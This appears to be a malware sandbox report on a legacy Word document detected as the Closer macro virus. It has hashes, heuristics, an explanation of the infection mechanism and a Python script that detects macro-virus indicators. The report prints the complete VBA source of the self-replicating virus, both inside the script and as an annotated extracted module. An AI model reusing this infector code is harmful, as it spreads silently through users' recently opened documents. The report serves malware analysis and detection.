Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 62e392638c622727…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 1999-05-27 08:45:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1c6b09818db0f8ae7dfefaef33fdbda8
SHA-1: 570d35f5fd590aedf0e39fce9eb968b6a850cb11
SHA-256: 62e392638c6227276ad916674bea3f7990d55a68870b37a0f65ff749c82e2a5d
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document containing VBA macros. The AutoClose macro, which Word runs without user interaction when the document is closed, minimizes the Word window, walks the RecentFiles list, opens each entry (so it becomes the active document) and calls the InfectMyAss subroutine against it, then quits Word; the line that would close each opened document is commented out. InfectMyAss suppresses all errors with On Error Resume Next, exports the module currently selected in the VBE (the "Closer" module) from the active document to c:\windows95.sys and, if the active document's VBProject does not already contain a module of that name, imports the file as a new module and saves the document in place with SaveAs, turning every recently used document into a carrier. Because the Export is taken from the active document, it fails silently on an uninfected target; the Import then depends on c:\windows95.sys having been written earlier, for example when the infected document itself appears in the recent-files list. An auto-execution trigger combined with VBProject Export/Import of its own module is the signature of a classic self-replicating macro virus rather than a downloader or dropper: the only file it writes is a copy of its own source. Propagation requires programmatic access to the VBA project object model, which Word 97-era hosts allowed by default and current Office versions gate behind the "Trust access to the VBA project object model" setting, so the macro still executes on a modern host but its replication step fails unless that setting is enabled.
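The trigger-plus-replication pattern described above can be checked mechanically on any extracted VBA source. The following Python script is an added example written for this report, not the sandbox's own heuristic code: it looks for Word auto-exec procedure names and for the VBProject Export/Import calls a macro needs to copy itself, and reports quoted drive paths used as the staging file. Its only inputs are the "Closer" module text copied from the macros.bas preview below and a constructed benign AutoOpen macro for contrast; the indicator names, thresholds and verdict strings are this example's own, and it assumes the VBA has already been extracted (for instance with oletools' olevba).

```python
"""Static triage of extracted VBA source for auto-exec triggers and
VBProject self-replication (classic Word macro-virus behaviour).
Added example for this report; not the sandbox's own heuristic code.
CLOSER_SRC is copied from the report's macros.bas preview; BENIGN_SRC is a
constructed control sample. Input is assumed to be already-extracted VBA."""
import re

# Procedure names Word runs without user interaction.
AUTOEXEC_NAMES = {
    "autoexec", "autoopen", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
}

# Object-model usage a macro needs to copy its own module into another
# document, plus evasion idioms seen alongside it. Names are this example's.
REPLICATION_PATTERNS = {
    "vbproject_access": re.compile(r"\bVBProject\b|\bVBE\b", re.I),
    "module_export": re.compile(r"\.Export\s", re.I),
    "module_import": re.compile(r"\.Import\s", re.I),
    "recent_files_walk": re.compile(r"\bRecentFiles\b", re.I),
    "save_in_place": re.compile(r"\.SaveAs\b", re.I),
    "error_suppression": re.compile(r"On\s+Error\s+Resume\s+Next", re.I),
    "window_hide": re.compile(r"wdWindowStateMinimize|\bVisible\s*=\s*False", re.I),
}
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
PATH_RE = re.compile(r"[\"']([A-Za-z]:\\[^\"']+)[\"']")  # quoted absolute Windows paths

CLOSER_SRC = r'''
Attribute VB_Name = "Closer"
Sub AutoClose()
Application.WindowState = wdWindowStateMinimize
RecMax = RecentFiles.Maximum
For i = 1 To RecMax
RecentFiles(i).Open
Call InfectMyAss
DocName = RecentFiles(i).Name
'Documents(DocName).Close
Next
Application.Quit
End Sub
Sub InfectMyAss()
On Error Resume Next
Set ActDok = ActiveDocument.VBProject.VBComponents
ActMod = Application.VBE.SelectedVBComponent.Name
ActInf = False
ActDok(ActMod).Export "c:\windows95.sys"
For i = 1 To ActDok.Count
    If ActDok(i).Name = ActMod Then ActInf = True
Next
If ActInf = False Then
    ActDok.Import "c:\windows95.sys"
    ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
'''

# Constructed control: auto-executes but never touches the VBA project.
BENIGN_SRC = '''
Attribute VB_Name = "Module1"
Sub AutoOpen()
    MsgBox "Welcome"
End Sub
'''


def find_autoexec(src):
    """Auto-executing procedure names defined in the source."""
    return sorted(p for p in PROC_RE.findall(src) if p.lower() in AUTOEXEC_NAMES)


def find_indicators(src):
    """Indicator names whose pattern occurs anywhere in the source."""
    return sorted(n for n, rx in REPLICATION_PATTERNS.items() if rx.search(src))


def find_staging_paths(src):
    """Quoted absolute paths, i.e. where a module is exported to / imported from."""
    return sorted(set(PATH_RE.findall(src)))


def classify(src):
    """Combine trigger and replication evidence into a verdict."""
    autoexec = find_autoexec(src)
    indicators = set(find_indicators(src))
    replicates = {"vbproject_access", "module_export", "module_import"} <= indicators
    if autoexec and replicates:
        verdict = "self-replicating macro virus"
    elif autoexec:
        verdict = "auto-executing macro, no self-replication"
    elif replicates:
        verdict = "VBProject self-copy without auto-exec trigger"
    else:
        verdict = "no macro-virus indicators"
    return {"verdict": verdict, "autoexec": autoexec,
            "indicators": sorted(indicators), "staging_paths": find_staging_paths(src)}


if __name__ == "__main__":
    for name, src in (("Closer", CLOSER_SRC), ("control", BENIGN_SRC)):
        print(name, classify(src))
```

The verdict deliberately requires both a trigger and the full Export/Import pair: an AutoOpen that only shows a message box, or a legitimate add-in that reads VBProject without importing modules, is reported but not labelled a virus.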

Heuristics 4

  • ClamAV: Doc.Trojan.Closer-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Closer-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Document defines an AutoClose procedure, which Word runs without user interaction when the document is closed
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic wording of this finding ("no modern VBA project was recovered") does not apply to this sample: a VBA project was recovered (macros.bas below) and the concrete trigger is its AutoClose procedure. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  950 bytes
            SHA-256: e95f272b47776300f0022311ccf2bf4295928389642dafb138d69a30f6d9c4e3
Script preview (first 1,000 lines of the extracted script; the 950-byte module is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument is the empty document class module (derived from Normal); the infector is the "Closer" module below.

Attribute VB_Name = "Closer"
' Word runs AutoClose automatically when the document is closed.
Sub AutoClose()
Application.WindowState = wdWindowStateMinimize   ' hide Word while it works
RecMax = RecentFiles.Maximum
For i = 1 To RecMax
RecentFiles(i).Open                               ' opened file becomes ActiveDocument
Call InfectMyAss
DocName = RecentFiles(i).Name
'Documents(DocName).Close                         ' disabled: targets stay open until Quit
Next
Application.Quit                                  ' closes every open document
End Sub
Sub InfectMyAss()
On Error Resume Next                              ' swallow every failure (missing module, locked file, denied VBProject access)

Set ActDok = ActiveDocument.VBProject.VBComponents  ' VBProject of the document just opened
ActMod = Application.VBE.SelectedVBComponent.Name   ' name of the module selected in the VBE ("Closer")
ActInf = False

ActDok(ActMod).Export "c:\windows95.sys"          ' dump the module's source to disk; fails silently if the active document lacks it

For i = 1 To ActDok.Count
    If ActDok(i).Name = ActMod Then ActInf = True ' does the target already carry the module?
Next

If ActInf = False Then
    ActDok.Import "c:\windows95.sys"              ' plant the module into the target's VBProject
    ActiveDocument.SaveAs ActiveDocument.FullName ' persist the infection in place
End If
End Sub